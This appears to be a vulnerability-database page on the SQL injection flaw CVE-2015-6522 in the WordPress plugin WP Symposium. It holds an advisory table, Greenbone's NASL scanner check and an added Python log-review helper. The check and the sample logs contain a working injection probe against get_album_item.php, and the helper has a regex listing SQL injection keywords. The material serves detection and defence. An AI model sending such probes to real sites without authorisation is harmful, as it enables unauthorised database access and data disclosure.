The WordPress plugin 'WP Symposium' is prone to multiple SQL injection vulnerabilities. Exploitation allows for SQL query manipulation or data disclosure. Affected version: 15.5.1; solution: update to version 15.8 or later.
Title | Published | Family |
---|---|---|
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection | 9 Aug 2015 00:00 | wpvulndb |
WordPress Symposium Plugin SQL Injection (CVE-2015-6522) | 8 Dec 2016 00:00 | checkpoint_advisories |
Sql injection | 19 Aug 2015 15:59 | prion |
WordPress Symposium Plugin SQL Injection | 31 Aug 2024 00:00 | packetstorm |
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection | 9 Aug 2015 00:00 | wpexploit |
WordPress Symposium Plugin 15.1 - SQL Injection #2 | 18 Aug 2015 00:00 | patchstack |
WordPress Symposium Plugin <= 15.7 - SQL Injection | 19 Aug 2015 00:00 | patchstack |
WordPress Symposium Plugin SQL Injection | 17 Nov 2016 14:04 | metasploit |
CVE-2015-6522 | 19 Aug 2015 15:00 | cvelist |
CVE-2015-6522 | 19 Aug 2015 15:59 | cve |
Source | Link |
---|---|
exploit-db | www.exploit-db.com/exploits/37824 |
exploit-db | www.exploit-db.com/exploits/37822 |
```nasl
# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.806026");
  script_version("2023-07-25T05:05:58+0000");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
  script_tag(name:"creation_date", value:"2015-08-24 15:13:35 +0530 (Mon, 24 Aug 2015)");
  script_tag(name:"qod_type", value:"remote_vul");
  script_name("WordPress WP Symposium Multiple SQL Injection Vulnerabilities");

  script_cve_id("CVE-2015-6522");

  script_tag(name:"summary", value:"The WordPress plugin 'WP Symposium' is prone to multiple SQL injection vulnerabilities.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check whether it is able to execute an SQL query or not.");

  script_tag(name:"insight", value:"Multiple flaws are due to input validation
  errors in 'forum_functions.php' and 'get_album_item.php' in the WP Symposium
  plugin.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to inject or manipulate SQL queries in the back-end database,
  allowing for the manipulation or disclosure of arbitrary data.");

  script_tag(name:"affected", value:"WordPress WP Symposium Plugin version
  15.5.1 and probably all existing previous versions may also be affected.");

  script_tag(name:"solution", value:"Update to WP Symposium version 15.8 or
  later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/37824");
  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/37822");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2015 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("wordpress/http/detected");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

# Only run against hosts where the WordPress detection script found an install.
if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

# Probe the 'size' parameter of get_album_item.php; a version string in the
# response shows the injected expression was evaluated by the database.
url = dir + "/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--";

if(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:"([0-9.]+)",
                   extra_check:"Set-Cookie: PHPSESSID")) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);
```
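As an added example (not part of the Greenbone script or the advisory), a small Python log-review helper for defenders that flags requests to the two plugin files named in the insight tag whose query parameters carry SQL metacharacters, such as the version() probe the check above sends. The access-log lines are constructed, and the metacharacter list and the assumption that legitimate parameter values are short alphanumeric tokens are mine.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the page): a benign request,
# the version() probe used by the Greenbone check, and an unrelated request.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Aug/2015:15:13:35 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=thumb HTTP/1.1" 200 512
203.0.113.10 - - [24/Aug/2015:15:13:36 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- HTTP/1.1" 200 12
198.51.100.7 - - [24/Aug/2015:15:14:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Plugin files the advisory names as affected.
VULN_FILES = ("get_album_item.php", "forum_functions.php")
# Assumption: legitimate values are short alphanumeric tokens, so any of these
# in the decoded value is suspicious.
SQLI_RE = re.compile(r"""[;'"()]|--|\bunion\b|\bselect\b|\bversion\b""", re.I)

def query_params(query):
    """Split on '&' only; the probe contains ';', which some parsers treat as a separator."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        # Double unquote so a double-encoded payload is also seen in plain form.
        yield unquote(name), unquote(unquote(value))

def analyze_line(line):
    """Return a hit dict for a suspicious request to a vulnerable plugin file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if "/wp-symposium/" not in parts.path or not parts.path.endswith(VULN_FILES):
        return None
    for name, value in query_params(parts.query):
        if SQLI_RE.search(value):
            return {"ip": m["ip"], "file": parts.path.rsplit("/", 1)[-1],
                    "param": name, "value": value, "status": int(m["status"])}
    return None

def find_probes(log_text):
    """Scan a whole log and collect every suspicious request."""
    return [hit for hit in (analyze_line(l) for l in log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```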